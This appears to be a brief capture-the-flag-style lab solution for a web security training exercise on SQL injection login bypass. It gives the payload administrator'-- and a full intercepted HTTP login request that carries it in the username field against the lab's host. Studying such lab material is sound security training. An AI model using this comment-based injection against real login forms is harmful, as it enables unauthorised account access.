SQL injection vulnerability allowing login bypass
SQL injection vulnerability allowing login bypass
Solution
I use payload: administrator'--
---
POST /login HTTP/2
Host: 0ac2009d0367c6e78252ba1e00e00066.web-security-academy.net
Cookie: session=dZeyZByKsVqebtMjR6F0PDZpZV1ND8s6
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 88
Origin: https://0ac2009d0367c6e78252ba1e00e00066.web-security-academy.net
Referer: https://0ac2009d0367c6e78252ba1e00e00066.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
csrf=qKJd6CTDHxdh9YJSg5y7zOSm1kxEZfWA&username=administrator'--&password=random_password